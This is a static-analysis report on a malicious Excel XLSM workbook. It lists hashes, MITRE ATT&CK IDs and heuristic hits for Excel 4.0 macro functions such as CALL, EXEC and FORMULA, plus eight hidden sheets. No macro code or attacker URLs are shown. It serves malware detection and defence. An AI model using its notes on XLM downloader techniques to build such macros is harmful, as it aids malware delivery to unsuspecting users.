Malicious Office (OOXML) / .XLSM — malware analysis report

Static analysis result for SHA-256 4072e8e6806dc45f…

MALICIOUS

Office (OOXML) / .XLSM

33.6 KB Created: 2020-05-17 14:23:36 UTC Authoring application: Microsoft Excel 16.0300
MD5: 7c35502cdc3e584a2835fdc42c504673 SHA-1: 7735e93abf9539ff343c339498af43568072b735 SHA-256: 4072e8e6806dc45f27ec62545190b558e0d8468911f518dfcaf32ace04ca9344
108 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Service Execution: Visual Basic T1204.002 Malicious File: Malicious Code

This XLSM file contains an Excel 4.0 macro sheet, which is a known vector for malware delivery. The critical heuristic firing indicates the use of dangerous XLM functions like RUN, FORMULA, and CALL, which can be used to execute arbitrary code and download payloads without invoking VBA. The presence of hidden sheets further suggests an attempt to conceal malicious activity. While no specific URLs or scripts were extracted, the core functionality points to a downloader or initial execution stage.

Heuristics 4

  • Dangerous XLM formula APIs: RUN, FORMULA, CALL, HALT critical OOXML_XLM_DANGEROUS_FN
    Excel 4.0 macro sheet uses formula APIs that call directly into Win32 (=CALL/=EXEC/=REGISTER/=FORMULA). These are the primitives used to download payloads, write files, and start processes from an XLM macro without invoking VBA.
  • Excel 4.0 macro sheet (1 sheet(s)) high OOXML_XLM_MACROSHEET
    Spreadsheet contains an Excel 4.0 (XLM) macro sheet — XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults. Even legitimate XLM use is rare in modern workbooks.
  • Hidden worksheet (hidden) low OOXML_HIDDEN_SHEET
    Excel workbook contains 8 hidden sheet(s) — hidden sheets are commonly used to conceal macro code, staging data, or intermediate payload construction
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/spreadsheetml/2006/main
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships
    • http://schemas.openxmlformats.org/markup-compatibility/2006
    • http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac
    • http://schemas.microsoft.com/office/spreadsheetml/2014/revision
    • http://schemas.microsoft.com/office/spreadsheetml/2015/revision2
    • http://schemas.microsoft.com/office/spreadsheetml/2016/revision3
    • http://schemas.microsoft.com/offi

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
xlm_sheet_00.xml
ce57c66c23767785cb2d7e9b5b55ed9b5d3a9f892ebfdf1f147a7297195d5cc4		 xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/sheet1.xml 77705 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.